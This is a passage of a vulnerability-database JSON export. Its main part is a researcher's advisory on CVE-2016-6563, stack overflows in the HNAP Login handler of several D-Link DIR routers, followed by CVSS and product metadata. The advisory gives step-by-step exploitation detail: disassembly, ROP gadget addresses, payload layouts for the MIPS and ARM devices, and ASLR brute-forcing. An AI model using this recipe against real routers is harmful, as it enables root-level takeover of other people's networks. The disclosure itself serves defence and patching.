"id": "CNVD-2018-09676"
},
{
"db": "VULHUB",
"id": "VHN-120768"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
},
{
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"date": "2018-05-10T00:00:00",
"db": "VULHUB",
"id": "VHN-120768"
},
{
"date": "2018-06-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"date": "2018-05-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-366"
},
{
"date": "2018-05-10T02:29:00.450000",
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"date": "2018-06-13T00:00:00",
"db": "VULHUB",
"id": "VHN-120768"
},
{
"date": "2018-06-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-366"
},
{
"date": "2024-11-21T03:42:23.703000",
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-868L Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
}
],
"trust": 0.6
}
}
var-201807-0057
Vulnerability from variot
Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L. D-Link Systems, Inc. According to the reporter ’s report, HNAP Communication LAN This is done only on the side interface. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.htmlOf the product LAN A third party who can access the side interface may execute arbitrary code with administrator privileges. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. D-Link DIR-823, etc. are all wireless router products of D-Link. tl;dr
A stack bof in several Dlink routers, which can be exploited by an unauthenticated attacker in the LAN. There is no patch as Dlink did not respond to CERT's requests. As usual, a Metasploit module is in the queue (see [9] below) and should hopefully be integrated soon.
The interesting thing about this vulnerability is that it affects both ARM and MIPS devices, so exploitation is slightly different for each type.
Link to CERT's advisory: https://www.kb.cert.org/vuls/id/677427
Link to a copy of the advisory pasted below: https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt
Have fun.
Regards, Pedro
Multiple vulnerabilities in Dlink DIR routers HNAP Login function (multiple routers affected) Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ========================================================================== Disclosure: 07/11/2016 / Last updated: 07/11/2016
Background on the affected products: "Smartphones, laptops, tablets, phones, Smart TVs, game consoles and more a all being connected at the same time. Thatas why we created the new AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to 3.2Gbps, it delivers the necessary ultra-performance to power even the most demanding connected homes, making it the best wireless home router for gaming."
Summary: Dlink routers expose a protocol called HNAP (Home Network Administration Protocol) on the LAN interface. This is a SOAP protocol that allows identification, configuration, and management of network devices. For more information regarding HNAP, see [1] and [2].
Dlink has a long history of vulnerabilities in HNAP. Craig Heffner in particular seems to have found a lot of them (see [3], [4], [5], [6], [7], [8]). The affected function contains two subsequent stack overflows, which can be exploited by an unauthenticated attacker on the LAN. It affects a number of Dlink routers which span the ARM and MIPS architectures. A Metasploit module that exploits this vulnerability for both architectures has been released [9].
A special thanks to CERT/CC and Trent Novelly for help with disclosing this vulnerability to the vendor. Please refer to CERT's advisory for more details [10]. See below for other constraints. Affected versions: The following MIPS devices have been confirmed to be vulnerable: DIR-823 DIR-822 DIR-818L(W)
The following ARM devices have been confirmed to be vulnerable: DIR-895L DIR-890L DIR-885L DIR-880L DIR-868L -> Rev. B and C only
There might be other affected devices which are not listed above.
Vulnerability details and MIPS exploitation
The vulnerable function, parse_xml_value (my name, not a symbol), is called from hnap_main (a symbol in the binary) in /htdocs/cgibin. This function takes 3 arguments: the first is the request object / string, the second is the XML tag name to be parsed inside the request, and the third is a pointer to where the value of that tag should be returned.
The function tries to find the tag name inside the request object and then extracts the tag value, copying it first to a local variable and then to the third argument. This function is called from hnap_main when performing the HNAP Login action to obtain the values of Action, Username, LoginPassword and Catpcha from the SOAP request shown above.
parse_xml_value(char request, char XMLtag, char* tag_value) (...) .text:00412264 xml_tag_value_start = $s2 .text:00412264 xml_tag_value_end = $s1 .text:00412264 C30 addu xml_tag_value_start, $v0, $s0 # s2 now points to $value .text:00412268 C30 la $t9, strstr .text:0041226C C30 move $a1, xml_tag_value_end # needle .text:00412270 C30 jalr $t9 ; strstr .text:00412274 C30 move $a0, xml_tag_value_start # haystack .text:00412278 C30 lw $gp, 0xC30+var_C20($sp) .text:0041227C C30 beqz $v0, loc_4122BC .text:00412280 C30 subu xml_tag_value_end, $v0, xml_tag_value_start # s1 now holds the ptr to value$ .text:00412284 C30 bltz xml_tag_value_end, loc_4122BC .text:00412288 C30 addiu $s0, $sp, 0xC30+xml_tag_var .text:0041228C C30 la $t9, strncpy .text:00412290 C30 move $a2, xml_tag_value_end # n .text:00412294 C30 move $a1, xml_tag_value_start # src .text:00412298 C30 addu xml_tag_value_end, $s0, xml_tag_value_end .text:0041229C C30 jalr $t9 ; strncpy # copies all chars in $value$ to xml_tag_var using strncpy .text:004122A0 C30 move $a0, $s0 # dest .text:004122A4 C30 move $a0, a2_ptr # a2_ptr is a stack variable from hnap_main (passed as third argument to parse_xml_value) .text:004122A8 C30 lw $gp, 0xC30+var_C20($sp) .text:004122AC C30 move $a1, $s0 # src .text:004122B0 C30 la $t9, strcpy # copies xml_tag_var into a2_ptr using strcpy .text:004122B4 C30 jalr $t9 ; strcpy # the stack of the calling function (hnap_main) is thrashed if 2408+ bytes are sent .text:004122B8 C30 sb $zero, 0(xml_tag_value_end) (...)
There are two overflows, therefore two choices for exploitation: 1) The local stack (on parse_xml_value) can be overrun with 3096+ bytes. This overflow occurs even though strncpy is used, because the argument to strncpy is simply the strlen of the value inside the XML tag. 2) Alternatively, it's possible to overrun the stack of the calling function (hnap_main), using only 2408+ bytes - this is because strcpy is used to copy the xml_tag_var onto the third argument received by parse_xml_value, which is a pointer to a stack variable in hnap_main.
Exploiting 1) is easier, and the following example will explain how.
All the affected MIPS devices use the same version of uClibc (libuClibc-0.9.30.3.so) and seem to load it at 0x2aabe000, which makes exploitation trivial for all firmware versions. It should be noted that the MIPS devices use the RTL8881a CPU, which is based on a Lextra RLX5281 core. The Lextra RLX cores are MIPS clones, but they're bit crippled as they are lacking a few load and store instructions. For this reason, some generic shellcodes that work on MIPS might not work on these CPUs (especially when obfuscated).
The devices also do not have NX, ASLR nor any other modern memory protections, so the shellcode is executed directly on the stack. However, it's necessary to use ROP to prepare the stack for execution, which can be executed with gadgets taken from libuClibc-0.9.30.3.so. Due to the way MIPS CPUs work, it's necessary to flush the CPU cache before executing the exploit. This can be forced by calling sleep() from libc (refer to http://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html for an explanation on the MIPS CPU caches).
So the ROP chain and shellcode will look like:
first_gadget - execute sleep and call second_gadget .text:0004EA1C move $t9, $s0 <- sleep() .text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget .text:0004EA24 li $a0, 2 <- arg for sleep() .text:0004EA28 lw $s0, 0x20+var_8($sp) .text:0004EA2C li $a1, 1 .text:0004EA30 move $a2, $zero .text:0004EA34 jr $t9 .text:0004EA38 addiu $sp, 0x20
second_gadget - puts stack pointer in a1: .text:0002468C addiu $s1, $sp, 0x58 .text:00024690 li $s0, 0x44 .text:00024694 move $a2, $s0 .text:00024698 move $a1, $s1 .text:0002469C move $t9, $s4 .text:000246A0 jalr $t9 .text:000246A4 move $a0, $s2
third_gadget - call $a1 (which now has the stack pointer): .text:00041F3C move $t9, $a1 .text:00041F40 move $a1, $a2 .text:00041F44 addiu $a0, 8 .text:00041F48 jr $t9 .text:00041F4C nop
When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (3000+ bytes), it's possible to jump back to xml_tag_value[0]. prep_shellcode_1 = 23bdf3c8 # addi sp,sp,-3128 prep_shellcode_2 = 03a0f809 # jalr sp branch_delay = 2084f830 # addi a0,a0,-2000 (NOP executed as a MIPS branch delay slot)
The final Action / Username / LoginPassword / Catpcha XML parameter value will be: shellcode + 'a' * (3072 - shellcode.size) + sleep() + '1' * 4 + '2' * 4 + '3' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay
'a', 'b' and 'c' are just fillers to make up the buffer, while '1111', '2222' and '3333' will be the values of s1, s2 and s3 registers (which are not interesting for exploitation), and the rest is the ROP chain, shellcode and stack preparation routine. The only bad character that cannot be sent in the payload is the null byte as this is a str(n)cpy overflow. Up to 3350 characters can be sent, as after that it's hard to control the overflow in a reliable way. Note that all of this is to exploit the first buffer overflow with strncpy, but the second buffer overflow can be exploited in a similar way.
As explained above, due to the use of a crippled MIPS core, generic shellcodes found on the Internet will likely fail. Some very simple ones work, but the best is to craft a reliable one. The simple Metasploit bind shell also seems to work pretty reliably if no encoder is used.
ARM exploitation
The same two stack overflows affect ARM, but require less bytes to overflow the stack. The following snippet is the same part of parse_xml_value as shown for MIPS (taken from firmware 2.03b01 for the DIR-868 Rev. B): .text:00018F34 C30 LDR R1, [R11,#src] ; src .text:00018F38 C30 LDR R2, [R11,#n] ; n .text:00018F3C C30 SUB R3, R11, #-xml_tag_var .text:00018F40 C30 SUB R3, R3, #4 .text:00018F44 C30 SUB R3, R3, #4 .text:00018F48 C30 MOV R0, R3 ; dest .text:00018F4C C30 BL strncpy ; first overflow occurs here (xml_tag_var in parse_xml_stack) with 1024+ characters .text:00018F50 C30 MOV R3, #0xFFFFFBEC .text:00018F58 C30 LDR R2, [R11,#n] .text:00018F5C C30 SUB R1, R11, #-var_4 .text:00018F60 C30 ADD R2, R1, R2 .text:00018F64 C30 ADD R3, R2, R3 .text:00018F68 C30 MOV R2, #0 .text:00018F6C C30 STRB R2, [R3] .text:00018F70 C30 SUB R3, R11, #-xml_tag_var .text:00018F74 C30 SUB R3, R3, #4 .text:00018F78 C30 SUB R3, R3, #4 .text:00018F7C C30 LDR R0, [R11,#a2_ptr] ; a2_ptr is is a stack variable from hnap_main .text:00018F80 C30 MOV R1, R3 ; src .text:00018F84 C30 BL strcpy ; second overflow occurs here
The stack size will be smaller for both parse_xml_value and hnap_main when compared to the MIPS binary. This time again it's easier to exploit the easier strncpy overflow in parse_xml_value, but only 1024 bytes are enough to overflow the stack. As with the MIPS exploit, the only bad character is the null byte.
The affected ARM devices have a non-executable stack (NX) and 32 bit ASLR. NX can be defeated with ROP, and the 32 bit ASLR is weak - there are only 3 bytes that change in the address calculations, which means there are only 4096 possible values. The attack has to be run several times until the correct base address is hit, but this can usually be achieved in less than 1000 attempts.
The easiest attack to perform is a return-to-libc to execute a command with system(). To do this, R0 must point to the stack location where the command is before system() is called. All the affected ARM devices seem to use the same version of uClibc (libuClibc-0.9.32.1.so) for all firmware versions, which makes gadget hunting much easier and allows building an exploit that works on all the devices without any modification.
first_gadget (pops system() address into r3, and second_gadget into PC): .text:00018298 LDMFD SP!, {R3,PC}
second_gadget (puts the stack pointer into r0 and calls system() at r3): .text:00040CB8 MOV R0, SP .text:00040CBC BLX R3
system() (Executes argument in r0 (our stack pointer) .text:0005A270 system
The final Action / Username / LoginPassword / Catpcha XML parameter value will be: 'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command
a / b = filler 0xffffffff = integer n (see below) AAAA = R11 first_gadget = initial PC payload = stack points here after execution of our ROP chain; it should point to whatever we want system() to execute
When the overflow happens, the stack var "n" is overwritten, which is used to calculate a memory address (see 0x18F58). In order not to crash the process before the shellcode is executed, the variable needs to be set to a numeric value that can be used to calculate a valid memory address. A good value to choose is 0xffffffff, as this will just subtract 1 from the calculated memory address and prevent an invalid memory access.
From this point onwards, it's possible to execute any command in "payload". For example, wget can be used to download a shell and execute it or a telnet server can be started. All commands will be executed as root.
Fix: Dlink did not respond to my or CERT's request for information, so no firmware fix is available at the time of writing. Given that this vulnerability can only be exploited in the LAN, it is recommended to have a strong wireless password to prevent untrusted clients from connecting to the router.
References: [1] https://isc.sans.edu//diary/More+on+HNAP+-+What+is+it,+How+to+Use+it,+How+to+Find+it/17648
[2] https://en.wikipedia.org/wiki/Home_Network_Administration_Protocol [3] http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/ [4] http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/ [5] http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/ [6] https://packetstormsecurity.com/files/134370/D-Link-DIR-818W-Buffer-Overflow-Command-Injection.html [7] https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf [8] http://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection [9] https://github.com/rapid7/metasploit-framework/pull/7543 [10] https://www.kb.cert.org/vuls/id/677427
================ Agile Information Security Limited http://www.agileinfosec.co.uk/
Show details on source websiteEnabling secure digital business >>
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-0057",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-818l\\",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-822",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-823",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-822",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-859",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-869",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-879",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-885l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-890l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-895l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-823",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-822",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
},
{
"model": "dir-818l",
"scope": "eq",
"trust": 0.3,
"vendor": "dlink",
"version": "0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#677427"
},
{
"db": "CERT/CC",
"id": "VU#305448"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-822_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-850l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-859_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-869_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-879_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-880l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-885l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-890l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-895l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pedro Ribeiro",
"sources": [
{
"db": "BID",
"id": "94130"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
],
"trust": 1.0
},
"cve": "CVE-2016-6563",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-6563",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.3,
"collateralDamagePotential": "NONE",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 6.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 8.6,
"id": "CVE-2016-6563",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "NOT DEFINED",
"severity": "HIGH",
"targetDistribution": "MEDIUM",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "ADJACENT NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 8.3,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 4.9,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 6.5,
"id": "CVE-2017-3193",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "MEDIUM",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2016-005757",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-95383",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2016-6563",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2016-005757",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-6563",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-6563",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-3193",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2016-005757",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201611-125",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-95383",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-6563",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#677427"
},
{
"db": "CERT/CC",
"id": "VU#305448"
},
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L. D-Link Systems, Inc. According to the reporter \u2019s report, HNAP Communication LAN This is done only on the side interface. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.htmlOf the product LAN A third party who can access the side interface may execute arbitrary code with administrator privileges. \nAn attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. D-Link DIR-823, etc. are all wireless router products of D-Link. tl;dr\n\nA stack bof in several Dlink routers, which can be exploited by an\nunauthenticated attacker in the LAN. There is no patch as Dlink did not\nrespond to CERT\u0027s requests. As usual, a Metasploit module is in the\nqueue (see [9] below) and should hopefully be integrated soon. \n\nThe interesting thing about this vulnerability is that it affects both\nARM and MIPS devices, so exploitation is slightly different for each type. \n\nLink to CERT\u0027s advisory:\nhttps://www.kb.cert.org/vuls/id/677427\n\nLink to a copy of the advisory pasted below:\nhttps://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt\n\nHave fun. \n\nRegards,\nPedro\n\n\u003e\u003e Multiple vulnerabilities in Dlink DIR routers HNAP Login function\n(multiple routers affected)\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information\nSecurity\n==========================================================================\nDisclosure: 07/11/2016 / Last updated: 07/11/2016\n\n\u003e\u003e Background on the affected products:\n\"Smartphones, laptops, tablets, phones, Smart TVs, game consoles and\nmore a all being connected at the same time. Thatas why we created the\nnew AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to\n3.2Gbps, it delivers the necessary ultra-performance to power even the\nmost demanding connected homes, making it the best wireless home router\nfor gaming.\"\n\n\n\u003e\u003e Summary:\nDlink routers expose a protocol called HNAP (Home Network Administration\nProtocol) on the LAN interface. This is a SOAP protocol that allows\nidentification, configuration, and management of network devices. 